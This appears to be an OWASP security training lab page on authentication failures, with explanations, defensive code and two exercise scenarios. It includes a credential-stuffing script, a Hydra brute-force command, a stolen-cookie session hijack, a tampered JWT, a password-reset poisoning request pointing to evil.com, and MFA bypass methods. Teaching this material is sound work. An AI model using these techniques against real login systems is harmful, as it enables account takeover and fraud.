OWASP Top 10 - A07 Identification and Authentication Failures

What are Identification and Authentication Failures?

Confirmation of the user's identity, authentication, and session management is critical to protect against authentication-related attacks. Authentication weaknesses may occur when the application permits automated attacks, allows default/weak passwords, uses weak credential recovery and forgot-password processes, or implements insufficient multi-factor authentication.

🎯 Common Authentication Vulnerabilities

Credential Stuffing: Automated attacks using lists of known breached credentials
Brute Force Attacks: Systematic password guessing without rate limiting
Weak Passwords: Default, weak, or well-known passwords permitted
Poor Credential Recovery: Insecure "forgot password" and account recovery processes
Missing MFA: Lack of multi-factor authentication for sensitive accounts
Session Management: Insecure session ID generation, fixation, and hijacking
Exposure of Credentials: Passwords stored in plain text or with weak hashing

⚠️ Attack Impact

Account takeover through credential compromise
Identity theft and fraud via session hijacking
Unauthorized access to sensitive data and functions
Privilege escalation through authentication bypass
Mass account compromise via credential stuffing
Business disruption through account lockouts

🔍 Attack Techniques

# Credential Stuffing Attack
import requests
from itertools import islice

def credential_stuffing(target_url, credential_list):
    for username, password in credential_list:
        data = {'username': username, 'password': password}
        response = requests.post(target_url + '/login', data=data)
        if 'dashboard' in response.text:
            print(f"[+] Success: {username}:{password}")

# Brute Force with Hydra
hydra -l admin -P passwords.txt http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid"

# Session Hijacking
GET /admin HTTP/1.1
Cookie: PHPSESSID=stolen_session_id
User-Agent: Mozilla/5.0...

# JWT Token Manipulation
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciJ9.
# Modify payload: {"user":"guest","role":"admin"}

# Password Reset Poisoning  
POST /forgot-password HTTP/1.1
Host: evil.com
email=victim@company.com
                

🔐 Session Management Attacks

# Session Fixation
1. Attacker gets session ID: SID=ABC123
2. Victim logs in with same SID
3. Attacker uses ABC123 to impersonate victim

# Session Hijacking Methods
- Network sniffing (unencrypted sessions)
- Cross-site scripting (XSS) cookie theft
- Man-in-the-middle attacks
- Physical access to unlocked devices

# Insecure "Remember Me" 
Cookie: remember_me=user:admin:md5(password)
# Predictable token allows account takeover

# JWT Vulnerabilities
- Algorithm confusion (RS256 vs HS256)
- Weak signing keys
- No signature verification
- Sensitive data in payload
                

🛡️ Secure Authentication Design

Multi-Factor Authentication: Implement MFA for all sensitive accounts
Strong Password Policies: Enforce complexity, length, and uniqueness requirements
Rate Limiting: Implement account lockouts and progressive delays
Secure Session Management: Use cryptographically strong session IDs
Password Hashing: Use bcrypt, scrypt, or Argon2 with proper salting
Account Monitoring: Log and alert on suspicious authentication activity

// Secure Password Hashing (bcrypt)
const bcrypt = require('bcrypt');
const saltRounds = 12;

// Hash password
const hash = await bcrypt.hash(password, saltRounds);

// Verify password
const match = await bcrypt.compare(password, hash);

// Secure Session Implementation
const session = {
    id: crypto.randomBytes(32).toString('hex'),
    userId: user.id,
    createdAt: new Date(),
    expiresAt: new Date(Date.now() + 3600000), // 1 hour
    ipAddress: req.ip,
    userAgent: req.get('User-Agent')
};

// Rate Limiting Example
const rateLimit = require('express-rate-limit');
const loginLimiter = rateLimit({
    windowMs: 15 * 60 * 1000, // 15 minutes
    max: 5, // Limit each IP to 5 requests per window
    skipSuccessfulRequests: true
});
                

🔐 Lab 1: Authentication Bypass and Credential Attacks

Scenario: You're testing a corporate login system that appears to have multiple authentication vulnerabilities. Your mission: exploit weak authentication mechanisms, perform credential attacks, and bypass multi-factor authentication.

🎯 Target Login System

🏢 CorporatePortal Login

Username:

Password:

MFA Code (if enabled):

💡 Hint: Try common usernames like admin, administrator, user, guest, test

⚡ Automated Attacks

Attack Type:

Target Username:

Wordlist/Credentials:

Attack log will appear here...

👥 User Account Database

admin - Administrator Account
Last Login: Never | MFA: Disabled

user - Standard User
Last Login: 2024-01-15 | MFA: Disabled

guest - Guest Account
Last Login: 2024-01-10 | MFA: Disabled

test - Test Account
Last Login: Never | MFA: Enabled

service - Service Account
Last Login: 2024-01-20 | MFA: Disabled

🔓 MFA Bypass Techniques

⚠️ MFA Bypass Methods

Social Engineering: Call helpdesk to disable MFA

Backup Codes: Try common backup code patterns

Race Condition: Submit multiple requests simultaneously

Brute Force: 6-digit codes = 1,000,000 combinations

MFA Bypass Method:

Authentication Security Assessment:

🎯 Discover and exploit weak credentials

🎯 Perform automated credential attacks

🎯 Bypass multi-factor authentication

🎯 Compromise at least 3 user accounts

🎯 Demonstrate authentication vulnerabilities

🚨 Authentication Vulnerabilities

This system demonstrates critical authentication flaws:

Weak Password Policies: Default and simple passwords permitted
No Rate Limiting: Unlimited login attempts allowed
Inconsistent MFA: Multi-factor authentication not enforced universally
Predictable Backup Codes: Sequential or pattern-based recovery codes
Poor Account Monitoring: No detection of suspicious login patterns

🎫 Lab 2: Session Management and Token Manipulation

Scenario: After gaining access to user accounts, you need to explore session management vulnerabilities. Your goal: hijack sessions, manipulate JWT tokens, and exploit "remember me" functionality to maintain persistent access.

Session Attacks: 0 | Sessions Hijacked: 0/3 | Token Manipulations: 0

🍪 Current Session Information

Session Details:

Session ID: Not logged in

User Role: None

Expires: N/A

IP Address: 192.168.1.100

No active session tokens

🎭 Session Hijacking

Hijacking Method:

Target Session ID:

Victim IP Address:

Session Hijacking Results

Attempt session hijacking to see results here

🔑 JWT Token Manipulation

JWT Header:

JWT Payload:

JWT Signature:

Complete JWT Token:

📝 Remember Me Exploitation

Remember Me Token:

Token Format:

Target User:

Remember me token analysis will appear here

Session Security Assessment Goals:

🎯 Analyze session management implementation

🎯 Perform session hijacking attacks

🎯 Manipulate JWT tokens for privilege escalation

🎯 Exploit insecure "remember me" functionality

🎯 Demonstrate persistent session compromise

🚨 Session Management Vulnerabilities

This application demonstrates several session security flaws:

Predictable Session IDs: Sequential or timestamp-based session generation
Weak JWT Implementation: Unverified signatures and client-side trust
Insecure Remember Me: Predictable tokens allowing account takeover
Session Fixation: No session ID regeneration after authentication
Missing Security Headers: No HttpOnly, Secure, or SameSite flags

Real-world Impact: Session vulnerabilities enable attackers to impersonate users, maintain persistent access, and bypass authentication controls.

OWASP Top 10 Security Lab

Identification and Authentication Failures